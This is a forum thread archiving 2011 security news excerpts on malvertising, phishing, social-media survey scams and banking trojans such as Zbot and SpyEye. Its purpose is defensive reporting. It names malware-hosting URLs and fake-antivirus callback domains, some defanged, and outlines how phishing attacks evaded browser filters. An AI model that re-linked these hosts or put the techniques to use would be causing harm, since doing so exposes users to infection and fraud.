SPAM frauds, fakes, and other MALWARE deliveries - archive

UK - malvertising attack ...

FYI...

UK - malvertising attack...
- http://www.theregister.co.uk/2011/02/28/tainted_ads_blight_uk_sites/
28 Feb. 2011 - "Several highly trafficked UK sites – including the website of the London Stock Exchange – served malware-tainted ads as the result of a breach of security by a third-party firm they shared in common. Surfers visiting auto-trading site Autotrader.co.uk and the cinema site Myvue.com were also exposed to the attack, which stemmed from a breach at their common ad provider, Unanimis, rather than at any of the three sites themselves. Unconfirmed reports suggest eBay.co.uk was also affected. The malicious ads made several concealed redirects before dropping surfers on a portal pimping rogue anti-virus (AKA scareware)... Websense** confirmed the attack on Monday, saying it had been tracking the progress of the attack over recent days..."
* http://www.highseverity.com/2011/02/london-stock-exchange-hit-by-malware.html

** http://community.websense.com/blogs...otrader-co-uk-infected-with-malvertizing.aspx

:mad::fear:
 
Morgan Stanley security breach...

FYI...

Morgan Stanley security breach...
- http://www.bloomberg.com/news/2011-...same-china-based-attacks-that-hit-google.html
2011-02-28 - "Morgan Stanley experienced a “very sensitive” break-in to its network by the same China-based hackers who attacked Google Inc.’s computers more than a year ago, according to leaked e-mails from a cyber-security company working for the bank. The e-mails from the Sacramento, California-based computer security firm HBGary Inc., which identify the first financial institution targeted in the series of attacks, said the bank considered details of the intrusion a closely guarded secret... The HBGary e-mails don’t indicate what information may have been stolen from Morgan Stanley’s databanks or which of the world’s largest merger adviser’s multinational operations were targeted... a spokeswoman for the New York-based bank, which unlike Google didn’t disclose the attacks publicly, declined to comment on them specifically... The hackers successfully implanted software designed to steal confidential files and internal communications, according to dozens of HBGary e-mails that detail efforts to plug the holes. One e-mail, dated June 19, said that the attackers may be the same ones who had hit a U.K.-based defense contractor and discusses hacking software called Monkif, which can be used by intruders to remotely orchestrate a sophisticated form of cyber attack known as an ‘advanced persistent threat’ or APT..."
- http://blog.damballa.com/?p=341

:fear::mad::fear:
 
"You have received a gift..." of malware ...

FYI...

"You have received a gift..." of malware...
- http://blog.mxlab.eu/2011/03/01/you...om-one-of-our-members-emails-lead-to-malware/
March 1, 2011 - "... new trojan distribution campaign by email with the subject “You have received a gift from one of our members !” The email is sent from the spoofed address “gifts@freeze.com”, while the SMTP from address is “_www@pictry.loc”... The URL in the email leads to hxxp:// www .i-tec .it/gift.pif and this malicious file is 844kB large... A Backdoor.IRCBot is installed allowing to open a backdoor to the infected computer, combined with Trojan.RunKeys that will make sure that trojans are started up when the computer boots... malware will make a connection with a remote IRC server..."
(Screenshots and more detail available at the MXLabs URL above.)

- http://tools.cisco.com/security/cen...currentPage=1&sortOrder=d&pageNo=1&sortType=d

:fear::mad:
 
Twitter survey SCAM ...

FYI...

Twitter survey SCAM...
- http://nakedsecurity.sophos.com/2011/03/02/11-6-hours-survey-scam-spreads-like-wildfire-on-twitter/
March 2, 2011 - "A rogue application has caught Twitter users off their guard today, with thousands of people duped into clicking on links believing that it will reveal how many hours they have spent on Twitter... However, if you click on the bit.ly link being used in the message you are taken to a page which attempts to connect a rogue application called "Time on Tweeter" with your Twitter account. The application instantly tweets a message to your Twitter feed, claiming that you have also spent 11.6 hours on Twitter... spreading the link virally, and then directs you to a page which presents a revenue-generating survey on behalf of the scammers. Affected users should revoke the application's access to their Twitter account immediately..."
(Screenshots available at the Sophos URL above.)

:fear:
 
SWF embedded JavaScript

FYI...

SWF embedded JavaScript
- http://blogs.technet.com/b/mmpc/archive/2011/03/07/embedded-javascript-in-swf.aspx
7 Mar 2011 - "... Since the beginning of this year, 89% of the targets were in South Korea with 75% of them specifically in Seoul. Here’s a chart with a breakdown by unique machines in the months January and February of this year (there has been no activity in March):
- http://www.microsoft.com/security/portal/blog-images/JASWI-0b.jpg
Attack attempts by unique machines in the months January and February of 2011
... The malware Trojan:SWF/Jaswi.A is unlike other SWF malware; other SWF malware typically calls “getURL <website address>” within an ACTION tag in order to visit a malicious website link without user consent... Trojan:SWF/Jaswi.A contains an embedded malicious JavaScript that initiates a legal Windows API call to trigger the payload... the legal function ExternalInterface.call() has been made to complete a procedure of initiating JavaScript injection... Internet Explorer vulnerability CVE-2010-0806 has been abused! This particular exploit affects Microsoft Internet Explorer versions 6, 6+SP1 and 7, and could allow a remote attacker to execute arbitrary code... The file “uusee.exe” from the obfuscated URL shown above is actually a prevalent password stealer in China... the embedded JavaScript technique used in the malicious SWF... appears to be a trend and may become a popular method..."

:mad::fear:
 
Malvertisements - a plague...

FYI...

Malvertisements - a plague...
- http://threatpost.com/en_us/blogs/one-million-web-sites-infected-end-2010-030711
March 7, 2011 - "... The Dasient Q4 Malware Update* reported that more than one million Web sites were infected in the last quarter of 2010. That period saw a 25% growth in malicious advertisements from the previous quarter, as attackers found ways to sneak malicious code into widely used syndicated online ad networks. Its a trend that security experts see accelerating in 2011, as malicious advertisements, sometimes referred to as 'malvertisements,' crop up on high profile sites, said Neil Daswani, Chief Technology Officer at Dasient. Daswani said that, overall, his company saw a 100% increase in the amount of malicious advertising from the third- to fourth quarters, 2010. However, much of that was due to an expansion of the sites Dasient monitored, with an increasing focus on so-called 'remnant' ad networks, which aggregate 'remnant' advertisements from direct marketers, who often have little oversight about where the ads appear... In recent weeks, well-ranked sites such as Autotrader .co.uk, cinema site Myvue .com and londonstockexchange .com were reported to have served up malicious advertisements. Malicious ads are commonly used to display pop up messages with links that will take users to a drive by download Web site download rogue anti virus programs or other threats..."
* http://blog.dasient.com/2011/03/dasient-q4-malware-update-significant.html

:fear::mad:
 
Virut malware spreads with warez ...

FYI...

Virut malware spreads with warez ..
- http://techblog.avira.com/2011/03/11/polymorphic-virut-malware/en/
March 11, 2011 - "W32/Virut.ce is one of the most widespread pieces of malware which can be found on infected computers. This file infector gets massively spread bundled with illegal software (warez). The virus is infecting executable files using latest techniques which make detecting and treating those files particularly difficult. On the current threat landscape we see more server-side polymorphic malware, infecting executable files is not as popular as a few years ago. During the last years emulation techniques have become better which makes detection of polymorphic malware much easier. The authors of the virus weren’t put off by the difficulties they faced in trying to infect executable files. But W32/Virut.ce is not only infecting executable files, the virus also includes a backdoor using the IRC protocol. This allows attackers to download and run further malware from the Internet which can (as example) steal information. The server to which the malware connects is a pre-defined IRC server, the channel is called “virtu”..."
- http://techblog.avira.com/wp-content/uploads/2011/03/Analysis_W32.Virut_.ce_.pdf
(PDF, 1 MB)

:fear::mad:
 
FTC advisory - charity SCAMS

FYI...

FTC advisory - charity SCAMS
- http://www.ftc.gov/opa/2011/03/earthquake.shtm
03/14/2011 - "After the earthquake that rocked Japan’s northeast coast and triggered a widespread tsunami last week, the Federal Trade Commission is urging consumers to be cautious of potential charity scams... carefully consider urgent appeals for aid that (are received) in person, by phone or mail, by e-mail, on websites, or on social networking sites. The agency’s Charity Checklist* advises consumers about donating wisely to charities..."
* http://www.ftc.gov/bcp/edu/pubs/consumer/alerts/alt114.shtm
___

- http://community.websense.com/blogs...cybercriminals-utilize-japanese-disaster.aspx
15 Mar 2011

:fear:
 
Last edited:
Phish targets BoA, PayPal...

FYI...

Phish targets BoA, PayPal...
- http://www.theregister.co.uk/2011/03/17/phishers_outgun_firefox_chrome/
17th March 2011 - "... phishing attacks targeting customers of Bank of America and PayPal circumvent fraud protections built in to the Mozilla Firefox and Google Chrome browsers by attaching an HTML file to the spam email. According to M86 researcher Rodel Mendrez*, the locally stored file opens a web form that collects the customers' login credentials, credit card numbers and other sensitive information and then uses a POST request to zap them to a PHP application on a legitimate website that's been compromised. By avoiding the use of more verbose GET requests and known phishing sites, the scam flies completely under the radar of the browsers' fraud protection features..."
* http://labs.m86security.com/2011/03/phishing-scam-in-an-html-attachment/
March 15th, 2011 - "... Phishers... have found ways to circumvent this anti-phishing protection by attaching an HTML file to the spam email. This system avoids the HTTP GET request to the phishing site, thus avoiding being blocked by the browser..."

:fear::spider:
 
Twitter SCAMS spreading fast

FYI...

Twitter SCAMS spreading fast
- http://nakedsecurity.sophos.com/201...book-users-profile-views-scam-spreading-fast/
March 17, 2011 - "... Thousands of Twitter users are falling once again for a scam that requires victims to grant access to a malicious application. Today's scam seems to be a continuance of a trend in which the scammers are adapting their ego-driven bogus Facebook apps to operate on Twitter... If you accept the application, not only will it post to your Twitter feed, it will also display an image with a random number that supposedly represents the number of people who have viewed your profile. Not surprisingly, the revenue generating opportunity for these scammers is a fake IQ test that suggests you could win a free iPad*... The advice remains the same as for Facebook. Be cautious of which games/apps you approve and carefully audit the authorization page to see if an app wants control of your account or permission to post..."
* http://sophosnews.files.wordpress.com/2011/03/twitterantispam500.png?w=500&h=244

:fear::fear:
 
SPAM/phish continues

FYI...

SPAM/phish continues...
- http://www.us-cert.gov/current/#ongoing_phishing_attack
March 18, 2011 - "... public reports of an ongoing phishing attack. At this time, this attack appears to be targeting PayPal, Bank of America, Lloyds, and TSB users. The attack arrives via an unsolicited email message containing an HTML attachment. This attack is unlike common phishing attacks because it locally stores the malicious webpage rather than directing user to a phishing site via a URL. Many browsers utilize anti-phishing filters to help protect users against phishing attacks, this method of attack is able to bypass this security mechanism..."
___

- http://tools.cisco.com/security/cen...currentPage=1&sortOrder=d&pageNo=1&sortType=d
March 18, 2011

:mad::fear:
 
Last edited:
Fake Facebook email - Zbot and Black Hole Exploit Kit "all in one"

FYI...

Fake Facebook email - Zbot and Black Hole Exploit Kit "all in one"
- http://community.websense.com/blogs...xploit-kit-all-in-facebook-comments-spam.aspx
18 Mar 2011 - "Websense... has detected a new malicious email campaign that masquerades as originating from Facebook. The campaign appears to actually be originating from the Cutwail/Pushdo spam bot. This time round, the Cyber criminals employ two attack vectors: social engineering and an exploit kit. Both end up with the Zeus/Zbot Trojan installed on the targeted machines... The malicious email is spoofed to appear to be coming from Facebook.com and says: "Hi, someone loves your photo comments, please click on the link to see all comments". It provides a fake URL disguised as a formal Facebook link. Once clicked, the user is redirected to an attack page and is prompted to download and run an "update" from Facebook. The "update" file is a Zeus/Zbot Trojan variant. At the time of writing, the file had only a 7% detection*... The attack isn't over yet. While the fake Facebook page loads, the user's machine is attacked silently with several exploits in the background. The exploits are sent via an iframe contained in the fake Facebook attack page. This process happens silently when the attack page is loaded. The exploits are loaded from one of the most prevalent exploit kits today - the Blackhole exploit kit. -Any- successful exploitation results in the Zeus/Zbot Trojan installed silently on the user's machine..."
* http://www.virustotal.com/file-scan...89a703e1c7d1ded2ff956aee11d5a2c0f1-1300384459
File name: facebook.update.utility.exe.1
Submission date: 2011-03-17 17:54:19 (UTC)
Current status: finished
Result: 3/43 (7.0%)
There is a more up-to-date report...
- http://www.virustotal.com/file-scan...89a703e1c7d1ded2ff956aee11d5a2c0f1-1300478516
File name: 8bba2928b7060906a3d433a96856acbb
Submission date: 2011-03-18 20:01:56 (UTC)
Result: 14/41 (34.1%)
There is a more up-to-date report...
- http://www.virustotal.com/file-scan...89a703e1c7d1ded2ff956aee11d5a2c0f1-1300555240
File name: 8bba2928b7060906a3d433a96856acbb
Submission date: 2011-03-19 17:20:40 (UTC)
Result: 18/41 (43.9%)

:fear::mad::fear:
 
Last edited:
Tax SCAM season...

FYI...

Tax Season - phishing scams, malware campaigns
- http://www.us-cert.gov/current/#us_tax_season_phishing_scams1
March 16, 2011 - "... These phishing scams and malware campaigns may include, but are not limited to, the following:
* information that refers to a tax refund
* warnings about unreported or under-reported income
* offers to assist in filing for a refund
* details about fake e-file websites
These messages which may appear to be from the IRS, may ask users to submit personal information via email or may instruct the user to follow a link to a website that requests personal information or contains malicious code...
• Do not follow unsolicited web links in email messages.
• Maintain up-to-date antivirus software..."
- http://www.irs.gov/privacy/article/0,,id=179820,00.html?portlet=5

(More info and detail at both URL's above.)

:mad::fear:
 
Spotify users attacked by drive-by malware...

FYI...

Spotify users attacked by drive-by malware...
- http://news.netcraft.com/archives/2011/03/25/spotify-free-users-attacked-by-malware.html
25 March, 2011 - "Users of the Spotify Free music streaming software have been attacked by drive-by malware. At least one attack used a Java exploit to drop malicious executable code on a victim's computer, with AVG software identifying one of the malicious payloads as Trojan horse Generic_r.FZ. Another threat blocked by AVG was a Blackhole Exploit Kit hosted on the uev1 .co .cc domain. Several people have reported the problem to Spotify over the past 24 hours, and attacks are still being reported at the time of publication. It is believed that the attacks are being launched through malicious third-party adverts which are displayed in ad-supported versions of the Spotify software. By exploiting local software vulnerabilities, the attacker can then install malware on unprotected computers."

- http://community.websense.com/blogs...spotify-application-serves-malicious-ads.aspx
25 Mar 2011 - "... The first report we have of a malicious ad being displayed is from around 11:30 GMT on March 24... In this case the malicious ad is actually displayed inside of the Spotify application... The application will render the ad code and run it as if it were run inside a browser. This means that the Blackhole Exploit Kit works perfectly fine and it's enough that the ad is just displayed to you in Spotify to get infected, you don't even have to click on the ad itself. So if you had Spotify open but running in the background, listening to your favorite tunes, you could still get infected. Seems like free does come at a price after all. Spotify removed all 3rd party ads in the free version while they did their investigation but the ads have now been turned back on again. Once the ad was displayed, the computer would connect to hxxp: //uev1 .co .cc where the exploit kit tries several vulnerabilities to infect the user. The IP address where the malicious content is hosted is well-known to us and we have seen it host the same exploit kit on several other domains... One of the vulnerabilities the exploit kit uses is a vulnerability in Adobe Reader/Acrobat. The kit uses a heavily obfuscated PDF file to make the infected computer download the fake AV software. Here are the VirusTotal reports for the PDF and the fake AV file*. Once the fake AV is launched it connects to the following domains to download additional content, including a rootkit** which is a packed version of TDSS:
• tuartma .in, rappour .in, findstiff .org, searchcruel .org, findclear .org, replity .in, searchgrubby .org, demivee .in, ripplig .in..."
(Screenshots and more detail available at the URL above.)
* http://www.virustotal.com/file-scan...66d1cf9dccb7c2ea3da3d42fd090c97acf-1301413767
File name: L9FPB1.pdf
Submission date: 2011-03-29 15:49:27 (UTC)
Result: 12/43 (27.9%)

** http://www.virustotal.com/file-scan...708c931467ce80de3b8fbf8fb98370f261-1301086553
File name: spotify_dropped.exe
Submission date: 2011-03-25 20:55:53 (UTC)
Result: 4/43 (9.3%)
There is a more up-to-date report...
- http://www.virustotal.com/file-scan...708c931467ce80de3b8fbf8fb98370f261-1301408014
File name: f5dcd2415fa4b069c0b934baee109ea5
Submission date: 2011-03-29 14:13:34 (UTC)
Result: 21/41 (51.2%)

:mad::mad:
 
Last edited:
SPAM frauds, fakes, and other MALWARE deliveries...

FYI...

Twitter worm "Profile Spy"...
- http://www.theregister.co.uk/2011/04/05/twitter_worm/
5 April 2011 - "... a virally spreading worm that attempts to make money by scamming users into filling out surveys and viewing advertisements.
The rogue Twitter app is known as Profile Spy and gets installed by people who are tricked into believing it can tell them who has been viewing their online microposts. “Wow! See who viewed your twitter with Profile Spy,” the come-on reads. Those who click on the link are asked to allow the app to access and update their account data. Once they do so, they are presented with an unending series of popups for online surveys and ads promoting car insurance, long distance services and games, according to Errata Security CEO Rob Graham*, who blogged about the worm on Monday..."
* http://erratasec.blogspot.com/2011/04/anatomy-of-twitter-worm-profile-spy.html
April 04, 2011

:fear::mad:
 
SpyEye banking trojan - same as ZeuS...

FYI...

SpyEye banking trojan - same as ZeuS...
- http://www.theregister.co.uk/2011/04/05/spyeye_mobile_trojan/
5 April 2011 - "Cybercrooks have deployed a sophisticated man-in-the-mobile attack using the SpyEye banking Trojan toolkit. The Trojan, which infects Windows machines, displays additional content on a targeted European bank's webpage that requests prospective marks to input their mobile phone number and the IMEI of the device. The bank customer is informed the information is needed so that a new "digital certificate" can be sent to the phone... More information on the SpyEye-based mobile banking Trojan attack can be found in a blog post by F-Secure here*."
* http://www.f-secure.com/weblog/archives/00002135.html
April 4, 2011

:mad:
 
Internet Security Threat Report...

FYI...

Symantec Internet Security Threat Report...
- http://www.symantec.com/about/news/release/article.jsp?prid=20110404_03
April 5, 2011 – "Symantec... today announced the findings of its Internet Security Threat Report, Volume 16, which shows a massive threat volume of more than 286 million new threats last year, accompanied by several new megatrends in the threat landscape...
> 2010: The Year of the Targeted Attack...
> Social Networks: Fertile Ground for Cybercriminals...
> Attack Toolkits Focus on Java...
> Mobile Threat Landscape Comes Into View...
> Key Facts and Figures:
• 286 million new threats...
• 93 percent increase in Web-based attacks...
• 260,000 identities exposed per breach...
• 14 new zero-day vulnerabilities...
• 6,253 new vulnerabilities...
• 42 percent more mobile vulnerabilities...
• One botnet with more than a million spambots - Rustock..."
(More detail available at the URL above.)

:fear::mad:
 
Facebook "video" SCAMS ...

FYI...

Facebook "video" SCAMS...
- http://community.websense.com/blogs...-golf-course-video-quot-scam-on-facebook.aspx
9 Apr 2011 - "... scam making its way across Facebook linking to a video titled "The Hottest & Funniest Golf Course Video - LOL"... When clicking on the link you're taken to the following page, tricking you into not only liking the page but also sharing it with your friends. It's doing this by using standard Facebook APIs... After liking and sharing the page, and attempting to view the video, the user is taken to a typical CPA Survey scam so in the end there's no video at all... As always, if a video forces you to like, share, or install an app to view it, DON'T..."

:mad:
 
SPAM malicious e-mail msgs continue...

FYI...

Virus Outbreak in Progress...
- http://www.ironport.com/toc/

- http://tools.cisco.com/security/cen...currentPage=1&sortOrder=d&pageNo=1&sortType=d
Malicious PDF Attachment E-mail Messages - April 13, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=22911
Fake Photograph Link E-mail Messages - April 13, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=22924
Fake Parcel Delivery Notification E-mail - April 13, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=22696
Fake Facebook Personal Message E-mail - April 13, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=20961
Malicious United Postal Svc Delivery Failure E-mail - April 13, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=22769

Fake Scanned Document E-mail Messages - April 12, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=21429
Fake Facebook Password Reset Notification E-mail Messages - April 12, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=22907
Fake Official Letter E-mail Messages - April 12, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=22910
Fake UPS Shipment Arrival E-mail Messages - April 12, 2011 ...
- http://tools.cisco.com/security/center/viewAlert.x?alertId=22030

:fear:
 
Last edited:
You must log in or register to reply here.
Back
Top